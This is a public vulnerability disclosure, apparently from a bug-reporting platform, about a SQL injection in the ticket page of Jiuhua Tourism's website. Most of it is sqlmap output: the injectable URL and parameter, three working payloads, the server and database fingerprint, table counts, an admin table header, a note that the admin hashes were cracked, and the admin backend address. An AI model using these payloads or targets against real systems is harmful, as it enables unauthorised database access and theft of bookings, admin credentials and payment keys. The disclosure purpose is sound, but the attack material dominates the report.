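2015-09-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-07: The vendor has actively ignored the vulnerability; details disclosed to the public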
Booking information leaked, administrator email leaked, payment key leaked. Jiuhua Tourism (stock code 603199)
Injection point
http://www.jiuhuashan.cc/expand_ticket/?tcid=4
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tcid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tcid=4) AND 2762=2762 AND (9972=9972

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.13
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] newjiuhuashan

Database: newjiuhuashan
[191 tables]

Database: newjiuhuashan
Table: admin
[12 entries]
+------------+------------+
| admin_pass | admin_name |
+------------+------------+
Thanks to chamd5 for cracking the hashes.
Admin backend address
http://www.ips.com.cn/
Fix the injection
Unable to contact the vendor, or the vendor actively refused